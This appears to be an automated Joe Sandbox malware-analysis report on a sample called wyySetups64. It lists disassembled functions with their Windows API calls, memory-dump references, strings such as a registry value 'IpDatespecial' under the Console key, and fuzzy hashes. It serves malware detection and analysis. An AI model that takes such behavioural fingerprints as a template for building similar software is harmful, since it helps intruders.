                                                                                                                                                                                                                • Part of subcall function 00BD1610: __vswprintf.LIBCMT ref: 00BD1646
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00BD2330
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __FF_MSGBANNER.LIBCMT ref: 00BD6E9C
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __NMSG_WRITE.LIBCMT ref: 00BD6EA3
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD6EC8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                                                                                                              • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                                                                                                              • API String ID: 3723585974-868042568
                                                                                                                                                                                                              • Opcode ID: 77d4a237b6bf7012914381d3cb438f4932e4586c37081841505e35dee5b96986
                                                                                                                                                                                                              • Instruction ID: a5c802ba553c8ebba17dfaa5fe5661b30dce77b829bac0f04792f1f60578a437
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77d4a237b6bf7012914381d3cb438f4932e4586c37081841505e35dee5b96986
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBB17C71A002459FCB18CF69D8816AABBE5FF94310F0886EBED199B346E731DD418B90
                                                                                                                                                                                                              Function 03372140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03371610: __vswprintf.LIBCMT ref: 03371646
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 03372330
                                                                                                                                                                                                                • Part of subcall function 0337F673: __FF_MSGBANNER.LIBCMT ref: 0337F68C
                                                                                                                                                                                                                • Part of subcall function 0337F673: __NMSG_WRITE.LIBCMT ref: 0337F693
                                                                                                                                                                                                                • Part of subcall function 0337F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F6B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                                                                                                              • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                                                                                                              • API String ID: 3723585974-868042568
                                                                                                                                                                                                              • Opcode ID: c56041a21e61f83af74beebf4583e5bd12f92129213fb8b314709e85b217d914
                                                                                                                                                                                                              • Instruction ID: b664ecbfff3d492613ecc851fafea73c86a25c5a0ac0de1cada968a7bb0b946a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c56041a21e61f83af74beebf4583e5bd12f92129213fb8b314709e85b217d914
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCB18075E002058BDF38DF69D8C06ABB7A5BF44210F084AAEDD59DB34AD739D941CB90
                                                                                                                                                                                                              Function 00BD1830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1878
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD18B6
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD18F5
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1935
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD195D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1981
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD19B9
                                                                                                                                                                                                                • Part of subcall function 00BD6E49: HeapFree.KERNEL32(00000000,00000000,?,00BD9900,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD6E5F
                                                                                                                                                                                                                • Part of subcall function 00BD6E49: GetLastError.KERNEL32(00000000,?,00BD9900,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000), ref: 00BD6E71
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: 1ae334ef2e48a13d88dad88e00ceec7b2a243e59f530a43b95db1bdea9b36711
                                                                                                                                                                                                              • Instruction ID: bf6234e4323c6cd7ebbeadf1b138c57cab777735452c33cdcb033161f98efd87
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ae334ef2e48a13d88dad88e00ceec7b2a243e59f530a43b95db1bdea9b36711
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C45149B6A00111AFD714DF5CC4D0855FBE6FF8931472984AED50A6B321EB32BD02CB91
                                                                                                                                                                                                              Function 03371830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 03371878
                                                                                                                                                                                                              • _free.LIBCMT ref: 033718B6
                                                                                                                                                                                                              • _free.LIBCMT ref: 033718F5
                                                                                                                                                                                                              • _free.LIBCMT ref: 03371935
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337195D
                                                                                                                                                                                                              • _free.LIBCMT ref: 03371981
                                                                                                                                                                                                              • _free.LIBCMT ref: 033719B9
                                                                                                                                                                                                                • Part of subcall function 0337F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03383E4C,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F64F
                                                                                                                                                                                                                • Part of subcall function 0337F639: GetLastError.KERNEL32(00000000,?,03383E4C,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000), ref: 0337F661
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: 07608a3087b77eb9fe4b470712bffe531d391a167192072caf75ed635df61327
                                                                                                                                                                                                              • Instruction ID: a70bf561ebe1037c85a23f3fc56bf2d7ebd49d40c99a6255f2b409adfd02365b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07608a3087b77eb9fe4b470712bffe531d391a167192072caf75ed635df61327
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF513CB6E00211DFC724DF58C5C4969BBAABF89314B2980ADC50A9F321D736AD42CFD1
                                                                                                                                                                                                              Function 00BD3870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD3883
                                                                                                                                                                                                              • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 00BD38C4
                                                                                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 00BD3931
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD395C
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 00BD39F4
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 00BD3A22
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 00BD3A39
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3058130114-0
                                                                                                                                                                                                              • Opcode ID: b4e7c7f10204c56213dc5a9f47dfe68852f0809335983ceb781957709beeadc9
                                                                                                                                                                                                              • Instruction ID: 455219dc1774d97c38f7c38854ac61b8d9153aea9d00cd2ccca89fdfe401430f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4e7c7f10204c56213dc5a9f47dfe68852f0809335983ceb781957709beeadc9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7151BE706007019BD7609F64C9957AAF7E4FF04B14F1005ABE95B9B382FBB5EA40CB42
                                                                                                                                                                                                              Function 03373870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 03373883
                                                                                                                                                                                                              • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 033738C4
                                                                                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03373931
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337395C
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 033739F4
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03373A22
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03373A39
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3058130114-0
                                                                                                                                                                                                              • Opcode ID: 22514c1734ba45f00b00095b747a9738bbf5497a98bc224cdf162d5cac90761d
                                                                                                                                                                                                              • Instruction ID: 6fb60cac116c89027a35506dda55b43ce78df056ab9c2a316671716a4026b688
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22514c1734ba45f00b00095b747a9738bbf5497a98bc224cdf162d5cac90761d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E517C78A007059BDB70DF24CDC4BABB7E8BF05724F14491AD996DB680EB39E840DB91
                                                                                                                                                                                                              Function 0337E6B0 Relevance: 10.5, APIs: 7, Instructions: 44filesynchronizationstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0337E815,?,?,?,?,74DF23A0,00000000), ref: 0337E6BD
                                                                                                                                                                                                              • CreateFileW.KERNEL32(033A0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0337E815,?,?,?,?,74DF23A0,00000000), ref: 0337E6D7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0337E6F2
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000), ref: 0337E6FF
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000), ref: 0337E70A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337E711
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0337E71E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4202892810-0
                                                                                                                                                                                                              • Opcode ID: 5b6f148700e5d62eab7ffb4b2d07c1dcd351deffce0f4a27c201cfbdeedf5327
                                                                                                                                                                                                              • Instruction ID: f9a046079420bd9a9d55f9057d0d36d363eff5b30ef3bb19344bedead4b90684
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b6f148700e5d62eab7ffb4b2d07c1dcd351deffce0f4a27c201cfbdeedf5327
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401C871241618FBE224B7A4BCCFF9B366CEB49B21F100605F715E61C4D7B5A81487A5
                                                                                                                                                                                                              Function 00BD97E2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00BE7C00,00000008,00BD98EA,00000000,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C), ref: 00BD97F3
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00BD9827
                                                                                                                                                                                                                • Part of subcall function 00BDC144: __mtinitlocknum.LIBCMT ref: 00BDC15A
                                                                                                                                                                                                                • Part of subcall function 00BDC144: __amsg_exit.LIBCMT ref: 00BDC166
                                                                                                                                                                                                                • Part of subcall function 00BDC144: EnterCriticalSection.KERNEL32(00000000,00000000,?,00BD99BA,0000000D,00BE7C28,00000008,00BD9AB1,00000000,?,00BD7711,00000000,00BE7B60,00000008,00BD7776,?), ref: 00BDC16E
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 00BD9834
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00BD9848
                                                                                                                                                                                                              • ___addlocaleref.LIBCMT ref: 00BD9866
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                              • String ID: KERNEL32.DLL
                                                                                                                                                                                                              • API String ID: 637971194-2576044830
                                                                                                                                                                                                              • Opcode ID: 5f09637eb42cdb76f7fe382c20a581cd71dcf453d52148b77ddea0b2699dc46e
                                                                                                                                                                                                              • Instruction ID: b9541a569599287e38310a2207cc9f6786631d2f39f19be516e6ee785b8974c1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f09637eb42cdb76f7fe382c20a581cd71dcf453d52148b77ddea0b2699dc46e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE01C0B1404B40DFD720AF6AD846349FBE0EF40324F10898FE4D69B3A1DBB0AA44CB51
                                                                                                                                                                                                              Function 03383D2E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03396318,00000008,03383E36,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C), ref: 03383D3F
                                                                                                                                                                                                              • __lock.LIBCMT ref: 03383D73
                                                                                                                                                                                                                • Part of subcall function 03388E5B: __mtinitlocknum.LIBCMT ref: 03388E71
                                                                                                                                                                                                                • Part of subcall function 03388E5B: __amsg_exit.LIBCMT ref: 03388E7D
                                                                                                                                                                                                                • Part of subcall function 03388E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03383F06,0000000D,03396340,00000008,03383FFF,00000000,?,033810F0,00000000,03396278,00000008,03381155,?), ref: 03388E85
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 03383D80
                                                                                                                                                                                                              • __lock.LIBCMT ref: 03383D94
                                                                                                                                                                                                              • ___addlocaleref.LIBCMT ref: 03383DB2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                              • String ID: KERNEL32.DLL
                                                                                                                                                                                                              • API String ID: 637971194-2576044830
                                                                                                                                                                                                              • Opcode ID: 5a764ff7ec27f823b183198ffe96111234cc50fd23a28ea9dd593dbfd3ecc140
                                                                                                                                                                                                              • Instruction ID: e0027f1f48b484f607ff251915e24d3a9f13270f7682625dd9780683ec2cdf5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a764ff7ec27f823b183198ffe96111234cc50fd23a28ea9dd593dbfd3ecc140
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63018479841B01EFEB20FF69D88574AFBE4AF40724F10490ED4D69B7A0CBB4A644CB15
                                                                                                                                                                                                              Function 0337B78C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0337B7A7
                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0337B7B7
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 0337B7CE
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000004), ref: 0337B7D9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CloseDeleteOpen
                                                                                                                                                                                                              • String ID: Console$IpDatespecial
                                                                                                                                                                                                              • API String ID: 3183427449-1840232981
                                                                                                                                                                                                              • Opcode ID: 1a2e8b592671692b8e1da4fd391b6a2874241733a6a1255e4683a3678311514b
                                                                                                                                                                                                              • Instruction ID: 7d58fa1d2cbec7c6299328075b8a03534b18b34fa42f2fc75580449656f99872
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a2e8b592671692b8e1da4fd391b6a2874241733a6a1255e4683a3678311514b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60F0A771354344FFF3259760AC8FF5BB758F789701F504A4FF784A52818665A140C755
                                                                                                                                                                                                              Function 00BE33F1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE3412
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE3423
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE3431
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                              • API String ID: 803148776-2671469338
                                                                                                                                                                                                              • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                                                                                                              • Instruction ID: 8547b66db439011bbe87b5b686524592b8e8cd28b2562cf6bfdec0d8f9a9b434
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E01A306041888ED721AB69C48EB6877F4FB88715F5A00F6E41DCB363E728EE508942
                                                                                                                                                                                                              Function 033902FC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0339031D
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0339032E
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0339033C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                              • API String ID: 803148776-2671469338
                                                                                                                                                                                                              • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                                                                                                              • Instruction ID: f014d6ed3b376f297581063f38b683c4c1343a37aea11598cef07c85aa08f5ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FE09A3D914304CFDB24EB68C5CAB6836D9BF48A25F5945A2D40CCF632D738E5908992
                                                                                                                                                                                                              Function 03379C30 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 03379C3F
                                                                                                                                                                                                                • Part of subcall function 0337F673: __FF_MSGBANNER.LIBCMT ref: 0337F68C
                                                                                                                                                                                                                • Part of subcall function 0337F673: __NMSG_WRITE.LIBCMT ref: 0337F693
                                                                                                                                                                                                                • Part of subcall function 0337F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F6B8
                                                                                                                                                                                                              • _free.LIBCMT ref: 03379C63
